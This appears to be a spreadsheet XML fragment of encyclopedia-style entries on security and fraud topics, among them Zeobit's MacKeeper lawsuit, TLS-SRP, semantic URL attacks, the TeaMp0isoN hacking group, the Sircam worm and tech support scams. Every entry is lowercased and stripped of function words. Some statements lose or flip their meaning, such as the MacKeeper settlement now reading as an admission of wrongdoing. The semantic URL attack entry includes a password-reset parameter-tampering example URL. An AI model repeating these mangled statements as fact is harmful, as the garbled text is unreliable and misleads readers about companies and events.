scammers request bitcoin alternative payment method. cultural references swedish film raskenstam (1983; alternate title, casanova sweden) fictionalized romantic comedy based true story swedish undertaker gustaf raskenstam, seduced women convinced many support various projects financially. usually used newspaper contact ads, often headline "sun spring", become idiomatic expression sweden. film directed gunnar hellstrom, written hellstrom birgitta stemberg, executive produced hellstrom brian wikstrom. several films television episodes depict story raymond fernandez martha beck, american serial killer couple known "the lonely hearts killers", believed killed many women murderous spree 1947 1949. pair unsuspecting victims lonely hearts ads.the honeymoon killers (1969 film) deep crimson (1996 film) lonely hearts (2006 film) cold case: "lonely hearts" (season episode airdate november 2006 alleluia (2014 film) 2008 series spamasterpiece theater featured episode "love song kseniya" centered romance scam email spam read website boing boing's xeni jardin. characters novel miniseries nine perfect strangers mental breakdown falling love with, subsequently losing thousands perpetrator romance scam. also scams advance-fee scam badger game catfishing scam baiting references external links phishing curlie</t>
  </si>
  <si>
    <t>Zeobit</t>
  </si>
  <si>
    <t>zeobit (stylized zeobit) technology software company formed 2009 slava kolomiychuk located sunnyvale, california. company specialized computer security software internet security. december 2016, longer business.zeobit best known bundled utility software mackeeper. software received mixed reviews reviewers divided effectiveness product. history zeobit incorporated september 2009 state california slava kolomiychuk. zeobit management headquarters sunnyvale, california partnership offices europe asia house developers customer support. march 2010 first product, mackeeper (for macos) released september 2010 pckeeper (for microsoft windows) released. 2010, first beta version mackeeper, version 0.8, released. october 2010, pckeeper (mackeeper's equivalent windows pcs) (version 1.1.48) released. october 2010, zeobit released mackeeper 1.0. january 2012, mackeeper released updates security, data control, cleaning optimization. 2014, pennsylvania woman filed class action lawsuit zeobit llc, claiming company's computer security program identifies problems exist generates false error messages scare users purchasing upgrade. (see holly yencha, zeobit llc, case 2:13-cv-00578, u.s. district court western district pennsylvania.) according complaint filed district court, "once installed, mackeeper prompts user conduct diagnostic scan", mackeeper class action lawsuit says. "this scan purportedly detects errors lead problems identified zeobit's marketing materials (i.e., performance issues, security privacy threats)—problems mackeeper supposedly designed fix." however, zeobit class action lawsuit alleges diagnostic scan completed, mackeeper reports identified thousands issues cause computer "critical" condition. while trial version mackeeper purports "fix" limited number issues, customers encouraged purchase full, registered version security software fully repair computer. yencha alleges neither free trial full versions mackeeper perform reliable diagnostic testing computer. "instead, zeobit intentionally designed mackeeper invariably ominously report user's needs repair at-risk harmful (but fabricated) errors, privacy threats, computer problems, regardless computer's actual condition", class action lawsuit alleges. class action settled 2015 admission wrongdoing customers given refunds. products mackeeper mackeeper utility software macos claims provide tools security, cleaning, optimization data control. mackeeper zeobit official sponsors macworld iworld expo francisco, california 2011 2012. acquired kromtech alliance corp 2013. mackeeper often criticized unethical marketing tactics, including pop-up advertising buying domain names similar names antivirus programs. zeobit claims affiliates responsible advertising accused unethical. mackeeper sometimes referred potentially unwanted program detected antivirus programs. pckeeper pckeeper bundle important system utilities performing different tasks antivirus, data control optimization tools, drive clean-up utilities much more. according virus bulletin, pckeeper scored 91.9% test listed number antivirus world. acquired kromtech alliance corp 2013. zeodisk zeodisk project cloud storage solution also integrated existing zeobit products. partnerships 2011 zeobit partnered avira integrate virus database technology mackeeper pckeeper's internet security features. this partnership allowed zeobit offer internet security options macos, windows, linux, freebsd, openbsd, solaris computing platforms. zeobit microsoft silver certified developer.zeobit official opswat partner. ratings reviews zeobit member better business bureau. rating, complaints advertising quality products. references external links zeobit website (archived) mackeeper website pckeeper website</t>
  </si>
  <si>
    <t>TLS-SRP</t>
  </si>
  <si>
    <t>transport layer security secure remote password (tls-srp) ciphersuites cryptographic protocols provide secure communication based passwords, using password-authenticated exchange. there classes tls-srp ciphersuites: first class cipher suites uses authentication. second class uses authentication public certificates together added security. usually, uses public certificates authentication. tls-srp uses value derived password (the verifier) salt, shared advance among communicating parties, establish connection. there several possible reasons choose tls-srp: using password-based authentication require reliance certificate authorities. user need check certified. server know data derived password connection simply cannot made. this prevents phishing. password authentication less prone certificate authentication certain types configuration mistakes, expired certificates mismatched common name fields. tls-srp provides mutual authentication (the client server authenticate other), server certificates authenticates server client. client certificates authenticate client server, easier user remember password install certificate. implementations tls-srp implemented gnutls, openssl release 1.0.1, apache mod_gnutls mod_ssl, curl, lite secureblackbox wolfssl. standards 2945: “the authentication exchange system”. 5054: “using secure remote password (srp) protocol authentication”. also transport layer security references</t>
  </si>
  <si>
    <t>Semantic URL attack</t>
  </si>
  <si>
    <t>semantic attack, client manually adjusts parameters request maintaining url's syntax altering semantic meaning. this attack primarily used driven websites. similar attack involving browser cookies commonly referred cookie poisoning. example consider web-based e-mail application users reset password answering security question correctly, allows users send password e-mail address choosing. after answer security question correctly, page arrive following form users enter alternative e-mail address: receiving page, resetpassword.php, information needs send password e-mail. hidden variable username contains value user001, username e-mail account. because form using data method, user submits alternative@emailexample.com e-mail address user wants password sent user arrives following url: http://semanticurlattackexample.com/resetpassword.php?username=user001&amp;altemail=alternative%40emailexample.comthis appears location browser, user identify username e-mail address parameters. user decide steal people's (user002) e-mail address visiting following experiment: http://semanticurlattackexample.com/resetpassword.php?username=user002&amp;altemail=alternative%40emailexample.comif resetpassword.php accepts values, vulnerable semantic attack. password user002 e-mail address generated sent alternative@emailexmaple.com causes user002's e-mail account stolen. method avoiding semantic attacks using session variables. however, session variables vulnerable types attacks session hijacking cross-site scripting. references also query string</t>
  </si>
  <si>
    <t>QTFairUse</t>
  </si>
  <si>
    <t>qtfairuse software application first released november 2003 lech johansen. dumps output quicktime stream file, could bypass digital rights management (drm) algorithm called fairplay used encrypt music content media files distributed itunes store, apple's online music store. although resulting files unplayable media players time release, represented first attempt circumventing apple's encryption. these early versions qtfairuse would save "raw" (not contained mpeg-4 (mp4) container), later incarnations properly supported full conversions. released terms general public license, qtfairuse free software. technical approach functionally, purpose qtfairuse convert protected audio files (.m4p extension) purchased apple's itunes store files, without drm. accomplish task uses rather uncommon approach: instead removing already present drm, waits itunes play back protected file intercepts unencrypted data stream sent sound card. during process, copies unencrypted data, frame-by-frame, inserts container free drm. itunes versions current release december 2007) qtfairuse6, version 6-2.5, supports itunes 6.0.2 7.0.2. updated config file compatible itunes 7.1.2 released 2007. itunes 7.3.1 compatible configuration file released june apple released itunes update. itunes 7.4.2.4 compatible configuration file released september 2007. this config file also compatible itunes 7.5.0.20. config file needs updated itunes release; author released updates itunes release. january 2008, author updated qtfairuse latest version itunes, current revision compatible version. cease desist february 2008, qtfairuse project given cease desist letter apple, inc. files subsequently removed main download site. references external links itunes copy protection 'cracked' news (posted october 2006) qtfairuse6: hymn finally back strip fairplay itunes engadget (posted august 2006) unlocks itunes locked music theregister (posted november 2003) cease desist order forum (posted february 2008)</t>
  </si>
  <si>
    <t>Template:R from CVE</t>
  </si>
  <si>
    <t>when used "redirect category shell" (rcat shell) template: template {{redirect category shell}} used rcat templates, along parameters categories, redirect. information documentation page below.when used itself:</t>
  </si>
  <si>
    <t>ShareFile</t>
  </si>
  <si>
    <t>sharefile secure content collaboration, file sharing sync software supports document-centric tasks workflow needs small large businesses. company also offers cloud-based on-premises storage, virtual data rooms client portals. sharefile owned citrix systems. history early history jesse lipson, self-taught programmer, built launched sharefile november 2005 raleigh, north carolina.lipson created sharefile several website design clients asked build password-protected area could folders exchange business files clients. felt sites time insufficient opportunity create web-based product. sharefile launched without free version outside funding, focused acquiring business customers.by 2011, sharefile million users countries. sharefile included inc. list fastest growing private companies 2010 2011. acquisition citrix systems october 2011, sharefile acquired citrix systems. under terms agreement, sharefile offered standalone service addition software becoming integrated citrix products. with acquisition, lipson became vice president general manager data sharing division within citrix deal. 2016, lipson corporate vice president general manager cloud services, includes sharefile citrix workspace cloud.a 171,000-square-foot raleigh office opened october 2014 raleigh-based citrix employees. april 2015, sharefile 55,000 corporate customers million users. product overview sharefile secure, cloud-based platform businesses store share large files. businesses able create branded, password-protected areas files service. software client-portal feature businesses customize allow outside vendors clients access specific projects files. other sharefile features include ability send obtain e-signatures documents integration rightsignature; ability send encrypted email microsoft outlook plugin online portal, office connection access edit documents stored sharepoint online onedrive business; ability individuals migrate data personal clouds sharefile. there also mobile versions sharefile, allow mobile editing offline editing documents. security features sharefile users option store data data centers, citrix-managed data centers, existing file storage systems storagezone connectors. this allows companies host files want stored cloud, cases regulatory concerns. managers manage corporate content sharefile using remote wipe, encryption, passcode lock poison pill features. addition, companies able restrict third-party editing tools employees might install devices, audit content accessed device lost stolen. industry-specific features response updated regulations hipaa standards, citrix created sharefile cloud health care 2013. this private virtual cloud designed help companies stay compliant updated hipaa standards. runs cloud, sets aside specific virtual servers host protected health information (phi). also 2013, sharefile began offering feature called "archiving financial services" help organizations financial sector comply data archiving regulations forth u.s. securities exchange commission financial industry regulatory authority. also cloud computing file synchronization hybrid cloud virtual data room references</t>
  </si>
  <si>
    <t>SipHash</t>
  </si>
  <si>
    <t>siphash add–rotate–xor (arx) based family pseudorandom functions created jean-philippe aumasson daniel bernstein 2012,: response spate "hash flooding" denial-of-service attacks (hashdos) late 2011.although designed hash function ensure security, siphash fundamentally different cryptographic hash functions like suitable message authentication code: keyed hash function like hmac. that designed difficult attacker find messages sha(x) sha(y), even though anyone compute sha(x). siphash instead guarantees that, seen siphash(xi, attacker know cannot find (any information about) siphash(y, message {xi} seen before. overview siphash computes 64-bit message authentication code variable-length message 128-bit secret key. designed efficient even short inputs, performance comparable non-cryptographic hash functions, cityhash,: used prevent denial-of-service attacks hash tables ("hash flooding"), authenticate network packets. variant later added produces 128-bit result.an unkeyed hash function collision-resistant entire output used. used generate small output, index hash table practical size, algorithm prevent collisions; attacker need make many attempts possible outputs. example, suppose network server designed able handle million requests once. keeps track incoming requests hash table million entries, using hash function identifying information request million possible table entries. attacker knows hash function need feed arbitrary inputs; million specific hash value. attacker sends hundred requests chosen hash value server, produce large number hash collisions, slowing possibly stopping) server effect similar packet flood many million requests.by using unknown attacker, keyed hash function like siphash prevents sort attack. while possible unkeyed hash function (hmac popular technique), siphash much efficient. functions siphash family specified siphash-c-d, number rounds message block number finalization rounds. recommended parameters siphash-2-4 best performance, siphash-4-8 conservative security. languages siphash-1-3 performance risk yet-unknown attacks. reference implementation released public domain software cc0. usage siphash used hash table implementations various software: following programs siphash ways: implementations also bloom filter (application fast hashes) cryptographic hash function hash function message authentication code list hash functions references external links jean-philippe aumasson; daniel bernstein (2016-08-01). "siphash: fast short-input project page". jean-philippe aumasson; daniel bernstein (2012-09-18). "siphash: fast short-input prf" (pdf). jean-philippe aumasson; daniel bernstein (2012-08-15). "siphash: fast short-input presentation slides" (pdf). jean-philippe aumasson; daniel bernstein; martin boßlet (2012-12-29). "hash-flooding reloaded: attacks defenses". "hashing". rust performance book. describes siphash fast enough</t>
  </si>
  <si>
    <t>TeaMp0isoN</t>
  </si>
  <si>
    <t>teamp0ison computer security research group consisting core members. group gained notoriety 2011/2012 blackhat hacking activities, included attacks united nations, nasa, nato, facebook, minecraft pocket edition forums, several large corporations government entities. teamp0ison disbanded 2012 following arrests core members, "trick", "mlt". english defence league teamp0ison released several documents pertaining english defence league (edl), leaking information included personal details several high-ranking members. addition, teamp0ison went deface edl's official website. facebook january 2011, unauthorized status updates posted mark zuckerberg french president nicolas sarkozy's accounts social-networking site facebook. january, spokesperson facebook acknowledged system said fixed. later week daily beast reported "trick", member teamp0ison, along members group known "zhc", said exploited site previous year's eve, allowing post unauthorized status updates block temporary newsfeeds list pages. spokeswoman targeted groups, english defence league, confirmed targeted pages critical islam indeed hacked. members facebook's security team said contacted matter daily beast, found evidence malicious activity logs. tony blair address book leak june 2011, group published appeared address book private data former british prime minister tony blair pastebin. according teamp0ison, data obtained originally december 2010. blair's spokesman said data obtained blair directly, personal email account former staff. teamp0ison responded this, commenting "blairs sheep lying info, webmail server private exploit wiped logs good luck". blackberry during 2011 england riots believed blackberry messenger service used looters collaboration. teamp0ison defaced official blackberry blog response research motion (rim), maker blackberry, promising co-operate united kingdom police government. teamp0ison released statement saying, rioters engaging attacks police government." government leaks july 2011, teamp0ison released eight court cases sarah palin, claiming intentions barack obama.on august 2011, teamp0ison released hashed administrator passwords website hosted nasa's domain, using public vulnerability.in november 2011, teamp0ison released list email addresses passwords reportedly obtained injection vulnerability united kingdom's ministry defence. ministry defence responsible controlling britain's defence policies also headquarters british armed forces. december 2011, teamp0ison leaked account data million south korean online game subscribers.in april 2012, teamp0ison targeted (the uk's secret intelligence service). group created script allowed repeatedly flood anti-terrorism hotline computer-generated calls, calling hotline order mock officers. officers warned would traced reported fbi. teamp0ison reportedly wiretapped agents, recording conversation officers posting leaked conversation youtube.on april 2012, teamp0ison gained access nato server, leaking data obtained server defacing index page site. operation censor this teamp0ison joined forces hacker collective anonymous announce opcensorthis, operation intended protest censorship. operation received media attention music artists lyricist jinn tabanacle created music video order raise awareness operation.teamp0ison went deface several sites support opcensorthis, significant united nations development programme, british tabloid newspaper, daily mail. operation robin hood response occupy movement, online announcement claimed teamp0ison joined anonymous launch operation robin hood, intending hack websites, obtain credit cards make donations activist organizations banks would refund hacked accounts. video stated: "operation robin hood take credit cards donate well various charities around globe. banks forced reimburse people money back", encouraging people "move accounts secure credit unions".as part operation robin hood, teamp0ison leaked 26,000 israeli credit card details, obtained vulnerabilities israeli banks, citynet.teamp0ison went publish credit card details passport scans well-known rapper sean combs (also known p-diddy). teamp0ison used credit card donate money charity order pizzas requested twitter. p-diddy launched internal investigation attempt track teamp0ison, reportedly hiring team private detectives. operation retaliation following arrest founding teamp0ison member "trick," group announced operation retaliation, began reported ddos attacks mi6, attacks took place against, among others, japanese electronics multinational panasonic, australian government, world health organization. addition, consternation security doxbin also reported hacked. united nations november 2011, teamp0ison released usernames login details, obtained united nations development programme. according spokeswoman undp data extracted server contains data". teamp0ison disputed statement, releasing server logs evidence suggest server still fact actively used united nations.in april 2012, teamp0ison hacked united nations again, time targeting un's world health organisation leaking list usernames hashed passwords, including administrator credentials. possible arrests april 2012, group created script call british anti-terrorism hotline hoax calls continuously 24-hour period protest extradition terrorist suspects united states. april, police arrested teenagers, aged incident suspicion violating malicious communications 1988 computer misuse act.on 2012, alleged teamp0ison member spokesperson "mlt" arrested officers scotland yard suspicion offences computer misuse act, relating attacks anti-terrorist hotline offences. activities 2015 2015, teamp0ison returned longer appear committing illegal activities. posting official twitter account, identified disclosed vulnerabilities google, amazon, ebay, harvard university, noaa, comcast, time warner cable, western union, united nations, london stock exchange, autodesk several large systems. teamp0ison also released several zero-day exploits, including affected memorial sites malcolm marilyn monroe, affected commonly-used wordpress plugin used large number websites. addition this, website forums returned alongside newly launched network, appears also plans wargaming website allowing penetration testers hone skills within legal ethical environment.in april 2015, teamp0ison identified disclosed vulnerabilities many major universities including harvard university, stanford university, princeton university, university texas, university california, among others. majority vulnerabilities found injection flaws. also time, teamp0ison identified zero-day injection vulnerability, resulting many sites compromised, including crime stoppers waterloo, ontario, peel canadian cities districts.in 2015, teamp0ison member "kms" targeted minecraft pocket edition forum, seemingly infiltrating database leaking list 16,000 usernames passwords. activities 2016 activities 2016 indicated came back black white group. they disclosed vulnerabilities united states department education, ucla, various institutions. february/march 2016, group breached agency america's largest internet service providers. during mid-february, teamp0ison breached united nations world tourism organization defaced forum index. during late february, teamp0ison breached time warner cable business class managed security services portal. their (since suspended) twitter feed indicated gained access backend ticket system well details 4,191 users. links isis teamp0ison member "trick" believed junaid hussain, black hacker arrested doxing tony blair's personal information. fled police bail reportedly joined isil. believed hussain became prominent isil propagandist, using social media recruit soldiers join isil, behind several high-profile attacks group name "cybercaliphate". hussain also believed links jihadi john. hussain also suspected cooperating isil members unmask individuals report rebel media groups, doxing u.s. soldiers families.hussain prominent target pentagon's disposition matrix influence overseas. august 2015, u.s. officials said "high level confidence" hussain killed drone strike syria. also hacktivism references</t>
  </si>
  <si>
    <t>Zero-knowledge password proof</t>
  </si>
  <si>
    <t>cryptography, zero-knowledge password proof (zkpp) type zero-knowledge proof allows party (the prover) prove another party (the verifier) knows value password, without revealing anything fact knows password verifier. term defined ieee p1363.2, reference benefits using password-authenticated exchange (pake) protocol secure off-line dictionary attacks. zkpp prevents party verifying guesses password without interacting party knows and, optimal case, provides exactly guess interaction.a common zero-knowledge password proof authentication systems party wants prove identity second party using password want second party anybody else learn anything password. example, apps validate password without processing payment check balance account without touching learning anything amount. history first methods demonstrate zkpp encrypted exchange methods (eke) described steven bellovin michael merritt 1992. considerable number refinements, alternatives, variations growing class password-authenticated agreement methods developed subsequent years. standards methods include ietf 2945, ieee p1363.2, iso-iec 11770-4. also cryptographic protocol outline cryptography key-agreement protocol secure remote password protocol references external links david jablon's links password-based cryptography</t>
  </si>
  <si>
    <t>Zero-knowledge service</t>
  </si>
  <si>
    <t>cloud computing, term zero-knowledge occasionally no-knowledge zero access) refers software services store, transfer manipulate data accessible owner, service provider. this accomplished encrypting data client side end-to-end case clients, respectively), without disclosing password service provider. this means neither service provider, third party might intercept data, ever decrypt access data own, allowing client higher degree privacy would otherwise possible. addition, zero-knowledge services usually aspire hold little metadata possible, jeopardize clients' privacy holding data beyond functionally needed service. term "zero-knowledge" popularized backup service spideroak, later switched using term knowledge" avoid confusion computer science concept zero-knowledge proof. providers zero-knowledge services include: cubbit lucidlink nordpass protonmail signal spideroak sync.com tresorit tarsnap disadvantages most cloud storage services keep copy client's password servers, allowing clients lost passwords retrieve decrypt data using alternative means authentication; since zero-knowledge services store copies clients' passwords, client loses password data cannot decrypted, making practically unrecoverable. most cloud storage services also able furnish access requests enforcement agencies similar reasons; zero-knowledge services, however, unable since systems designed make clients' data inaccessible without client's explicit cooperation. references</t>
  </si>
  <si>
    <t>Sircam</t>
  </si>
  <si>
    <t>sircam computer worm first propagated 2001 e-mail microsoft windows systems. affected computers running windows windows windows (millennium). began following lines text attachment consisting worm's executable file infected computer appended: send file order advice hope like file sendo hope help file send this file information mando este archivo para punto vista spanish) espero guste este archivo mando espero puedas ayudar archivo mando este archivo informacion pedistedue error worm, message rarely sent form send file order advice." this subsequently became in-joke among using internet time, spammed e-mails containing string sent worm. sircam notable outbreak distributed itself. document files (usually .doc .xls) infected computer chosen random, infected virus emailed email addresses host's address book. opening infected file resulted infection target computer. during outbreak, many personal private files emailed people otherwise received them. could also spread open shares network. sircam scanned network computers shared drives copied machine open (non-password protected) drive directory. simple (remote procedure call) executed start process target machine, usually unknown owner now-compromised computer. over year initial 2001 outbreak, sircam still virus charts. also timeline computer viruses worms references</t>
  </si>
  <si>
    <t>SiteKey</t>
  </si>
  <si>
    <t>sitekey web-based security system provides type mutual authentication end-users websites. primary purpose deter phishing. sitekey deployed several large financial institutions 2006, including bank america vanguard group. both bank america vanguard group discontinued 2015.the product owned data security 2006 acquired original maker, passmark security. works sitekey uses following challenge–response technique: user identifies (not authenticates) site entering username (but password). username valid site proceeds. user's browser contain client-side state token (such cookie flash cookie) previous visit, user prompted answers "security questions" user-specified site sign-up time, "which school last attend?" site authenticates user displaying image and/or accompanying phrase earlier configured. user recognize own, assume site phishing site immediately abandon recognize them, consider site authentic proceed. user authenticates site entering password. password valid username, whole process begins again. valid, user considered authenticated logged in.if user phishing site different site domain legitimate domain, user's browser refuse send state token step (2); phishing site owner either need skip displaying correct security image, prompt user security question(s) obtained legitimate domain pass answers. theory, could cause user become suspicious, since user might surprised re-prompted security questions even used legitimate domain browser recently. however, practice, evidence users generally fail notice anomalies. weaknesses harvard study found sitekey ineffective. practice, real people notice, care, sitekey missing, according results. also requires users keep track authentication information. someone associated different websites sitekey must remember different 4-tuples information: (site, username, phrase, password). discontinuation 2015, bank america announced sitekey would discontinued users year, would allow users username password step. july 2015, vanguard also discontinued sitekey website. notes external links authentication online banking environment sitekey bank america fraud vulnerabilities sitekey security bank america</t>
  </si>
  <si>
    <t>Template:Information Security Certifications</t>
  </si>
  <si>
    <t>initial visibility: currently defaults autocollapse template's initial visibility, |state= parameter used: |state=collapsed: {{information security certifications|state=collapsed}} show template collapsed, i.e., hidden apart title |state=expanded: {{information security certifications|state=expanded}} show template expanded, i.e., fully visible |state=autocollapse: {{information security certifications|state=autocollapse}} shows template collapsed title {{navbar}}, {{sidebar}}, table page collapsible attribute shows template expanded state collapsible items page |state= parameter template page set, template's initial visibility taken |default= parameter collapsible option template. template page, currently evaluates autocollapse.</t>
  </si>
  <si>
    <t>Share (P2P)</t>
  </si>
  <si>
    <t>share (シャレ(洒落),シェア) name closed-source application developed japan ファイル倉庫, pseudonym translating 'file warehouse.' share developed successor winny. like winny, share functions using distributed data store referred cache computer acting node network. netagent published survey june 2018 suggesting share third popular network japan winny perfect dark (p2p) approximately 10,000 nodes connecting golden week, 30,000 2015. background share's logo refers laughing man, fictional character anime series ghost shell: stand alone complex, anonymous hacker. share uses encryption hide identity transferring transferring. non-centralized cannot easily shut supports multiple source "swarm" downloading. files transferred encrypted must decrypted upon download completion. meantime stored encrypted form "cache" folder. this folder also used allow recently downloaded files shared among network based priorities. share also features plugin system. plugins readily available share network. written delphi. unlike winny, share allows users specify cluster keywords, though active (winny allowed cluster words, system confusing). these used connect nodes also specified cluster keywords. this allows users maintain connections nodes sharing files might interested disconnecting nodes share content concerned about. users specify auto-download triggers auto-block filters. network also appears sort "forgery warning" system warn people possible falsified data/files. like winny, share uses trip verify identity person sharing file. trip sort encrypted identifies person are. this allows users decide whether trust person based previous sharing experience them. when version share becomes available, users given notice share statusbar. when happens, users search version share network, download reliable source based trip. criticism share highly popular japan, west, concerns raised. japan, high speed internet readily available western europe north america. reason minimum upload download limits kb/s. also, cache system around free space given time store cached downloads. this might inconvenient people small hard drives. closed source product, share partially relies security obscurity. like many applications, share downloads files blocks. however, share export partially downloaded files sequential manner. example, file blocks block missing, share able export block 52-100 even already downloaded. plugin developers tried overcome limitation. download share downloaded share ファイル共有ソフトノード登録所 websites. language localizations unlike winny, share includes option language localisation changes (labeling buttons, etc.). locale.txt file contains information particular language resides share directory. english localization english localization (tcp version) english localization (udp version) more english localizations locate/hint/readme/info spanish localization legal issues 2008, three japanese people aged arrested kyoto, japan illegally uploading copyrighted files share. these first share-related cases japan. nevertheless, research showed significant drop on-line share users arrests.on november 2008, another male share user arrested japan illegally uploading japanese drama share.on february 2009, male share users became first arrested charges uploading child pornography share.on september 2009, multiple japanese media reported arrested uploading nintendo game software include square enix's dragon quest they first users arrested uploading games.on november 2009, japanese woman arrested sharing anime, music, movies, games. original uploaders. march 2010, 62-year-old seiji sato spotted surveillance software sharing avatar movies.on january 2011, people arrested sharing movies, anime, music, games software. also anonymous file sharing japan perfect dark (p2p) winmx winny references external links english) share english) share english) english info/faq site english) share guide japanese) ファイル共有ソフトノード登録所 download nodes japanese) share japanese) share japanese) share wiki korean) winnyshare community spanish) spanish share information</t>
  </si>
  <si>
    <t>Risciso</t>
  </si>
  <si>
    <t>risc-iso (stylized risciso) (pronounced risk risk eye-so) online warez group, founded approximately 1993, dedicated distributing newly released copyrighted software, games movies. acronym "risc" stood rise superior couriering, "iso" referred file format commonly used storage transfer disc images although group risc risciso completely separate groups. organization operated operation site down raids summer 2005. american authorities still searching organization's ring leader sean patrick o'toole, failed appear american court february 2006. placed call friend group leader sandy fury, wishing happy birthday apology disappeared heathrow airport. all, total individuals charged 15-count indictment brought u.s. attorney's office patrick fitzgerald u.s. district court chicago. lead prosecutor government case assistant u.s. attorney pravin rao. (aap, 2006). september 2008, sean o'toole still fugitive heard years. linda waldron remains fugitive home barbados. 2008, executive editor wiley sons, publishers kevin mitnick bruce schneier books, talks fury publishing deal another book piracy released around time plans stalled. report released 2011 showed materials available download risciso's servers exceeded $6.5 million. also operation site down risciso indictments notes references aap. seeks accused aussie internet pirate." age. february 2006. online, last consulted september 2010 enigmax [pseud.] "despite worldwide search, risciso warez leader escapes justice." torrent freak. 2007. online, last consulted september 2010 jorge gonzalez. "usa copyright infringer sentenced months prison!" zeropaid. 2008. online, last consulted september 2010 jones. "warez site operator sentenced months: prosecutors said david fish's sentencing linked largest successful global criminal enforcement actions ever taken organized piracy." informationweek. 2008. online, last consulted september 2010 accuses cyber-piracy group 'massive' theft". eweek. archived original march 2016. "u.s. accuses cyber-piracy group "massive" theft". computerworld. february 2006. "global gang software crackers busted". news. february 2006. external links "united states department justice press release" (pdf). archived original (pdf) september 2006. (162</t>
  </si>
  <si>
    <t>Technical support scam</t>
  </si>
  <si>
    <t>technical support scam, tech support scam, type fraud scammer claims offer legitimate technical support service. victims contact scammers variety ways, often fake pop-ups resembling error messages fake "help lines" advertised websites owned scammers. technical support scammers social engineering variety confidence tricks persuade victim presence problems computer mobile device, malware infection, issues victim's device. scammer persuade victim fictitious "problems" claim found. payment made scammer ways hard trace fewer consumer protections place could allow victim claim money back, usually gift cards. technical support scams occurred early 2008. 2017 study technical support scams found could geolocated, could traced locations india, locations united states locations costa rica. research tech support scams suggests millennials generation highest exposure scams; however, senior citizens likely lose money tech support scams. technical support scams named norton phishing threat consumers october 2021; microsoft found consumers took part survey exposed technical support scam within previous twelve months. responses technical support scams include lawsuits brought companies responsible running fraudulent call centres scam baiting. origin distribution first tech support scams recorded 2008. technical support scams seen variety countries, including united states, canada, united kingdom, ireland, australia, zealand, india south africa.a 2017 study technical support scams published ndss symposium found that, tech support scams involved could geolocated, could traced locations india, locations united states locations costa rica. india millions english speakers competing relatively jobs. municipality jobs received 19,000 applicants. this high level unemployment serves incentive tech scamming jobs, often well-paid. additionally, scammers exploit levels unemployment offering jobs people desperate employed. many scammers realise applying trained tech support scam jobs, many decide stay finding nature feel late back change careers. scammers forced choose keeping becoming jobless. some scammers convince targeting wealthy people money spare, justifies theft, whilst others generating "easy money". operation technical support scams rely social engineering persuade victims device infected malware. scammers variety confidence tricks persuade victim install remote desktop software, scammer take control victim's computer. with access, scammer launch various windows components utilities (such event viewer), install third-party utilities (such rogue security software) perform tasks effort convince victim computer critical problems must remediated, infection virus. scammers target variety people, though research microsoft suggests millennials (defined microsoft 24-37) people part generation (age 18-23) highest exposure tech support scams federal trade commission found seniors (age over) likely lose money tech support scams. scammer urge victim "issues" fixed. initiation technical support scams begin variety ways. some variants scam initiated using pop-up advertising infected websites cybersquatting major websites. victim shown pop-ups resemble legitimate error messages blue screen death freeze victim's browser. pop-up instructs victim call scammers phone number "error". technical support scams also initiated cold calls. these usually robocalls claim associated legitimate third party microsoft apple. technical support scams also attract victims purchasing keyword advertising major search engines phrases "microsoft support". victims click adverts taken pages containing scammer's phone numbers. confidence tricks once victim contacted scammer, scammer usually instruct download install remote access program teamviewer, anydesk, logmein gotoassist. scammer convinces victim provide credentials required initiate remote-control session, giving scammer complete control victim's desktop.after gaining access, scammer attempts convince victim computer suffering problems must repaired, often putative result malicious hacking activity. scammers several methods misrepresent content significance common windows tools system directories evidence malicious activity, viruses malware. these tricks meant target victims unfamiliar actual uses tools, inexperienced users senior citizens. scammer coaxes victim paying scammer's services software, claim designed "repair" "clean" computer actually malware infects software causes damage, nothing all. scammer direct users windows' event viewer, displays logfile various events system administrators troubleshoot problems. although many entries relatively harmless notifications, scammer claim entries labeled warnings errors evidence malware activity computer becoming corrupted, must "fixed". scammer show system folders contain unusually named files victim, windows' prefetch temp folders, claim files evidence malware victim's computer. scammer open files notepad, file contents rendered mojibake. scammer claims malware corrupted files, causing unintelligible output. reality, files prefetch typically harmless, intact binary files used speed certain operations. scammer claim normally disabled services disabled, services need enabled. scammer misuse command prompt tools generate suspicious-looking output, instance using tree command displays extensive listing files directories. scammer claim utility malware scanner, tool running scammer enter text purporting error message (such "security breach trojans found") appear finishes, blank notepad document. scammer misrepresent values keys stored windows registry malicious, innocuous keys whose values listed set. "send windows function associated globally unique identifier. output command assoc, lists file associations system, displays association line zfsendtotarget=clsid\{888dca60-fc0a-11cf-8f0f-00c04fd7d062}; guid versions windows. scammer claim unique used identify user's computer, reading identifier "verify" legitimate support company information victim's computer, claim clsid listed actually "computer licence security must renewed. scammer claim alleged "problems" result expired hardware software warranties, example, windows product keys, coax victim paying "renewal". scammer block victim viewing screen, claiming result malware scan run, time search victim's files sensitive information, attempt break victim's accounts stolen stored credentials activate webcam victim's face. scammer netstat command terminal/command window, shows local foreign addresses. scammer tells victim addresses belong hackers gained access computer. scammer claim legitimate windows process rundll32.exe virus. often, scammer search article windows process scroll section saying process name also possibly part malware, even though victim's computer contain malware. payment impact preferred method payment technical support scam gift cards. gift cards favoured scammers readily available less consumer protections place could allow victim reclaim money back. additionally, usage gift cards payment allows scammers extract money quickly whilst remaining anonymous. tech support scammers also known payment form cryptocurrency, cheques direct bank transfers made automated clearing house (the latter gives victims days recover funds).if victim refuses follow scammer's instructions them, scammers known resort insulting threatening victim procure payment. crimes threatened inflicted victims families scammers ranged theft, fraud extortion, serious crimes rape murder. canadian citizen jakob dulisse reported that, upon asking scammer targeted, scammer responded death threat; 'anglo people travel country' (india) 'cut little pieces thrown river.' scammers also known lock uncooperative victims computer using syskey utility (present windows versions previous windows third party applications install victim's computer, delete documents and/or programs essential operation victim's computer receive payment.microsoft commissioned survey yougov across countries july 2021 research tech support scams impact consumers. survey found approximately consumers participated exposed technical support scam within last months. victims reported losing average scammers many faced repeated interactions scammers successfully scammed. norton named technical support scams phishing threat consumers october 2021, blocked 12.3 million tech support scam urls july september 2021. response legal action taken companies carrying technical support scams. december 2014, microsoft filed lawsuit california-based company operating scams "misusing microsoft's name trademarks" "creating security issues victims gaining access computers installing malicious software, including password grabber could provide access personal financial information". december 2015, state washington sued firm iyogi scamming consumers making false claims order scare users buying iyogi's diagnostic software. iyogi also accused falsely claiming affiliated microsoft, hewlett-packard apple.in september 2011, microsoft dropped gold partner comantra microsoft partner network following accusations involvement cold-call technical-support scams. however, ease companies carry technical support scams launched makes difficult prevent tech support scams taking place.major search engines bing google taken steps restrict promotion fake technical support websites keyword advertising. microsoft-owned advertising network bing (which services sales bing yahoo! search engines) amended terms service 2016 prohibit advertising third-party technical support services claiming "provide service provided actual owner products service 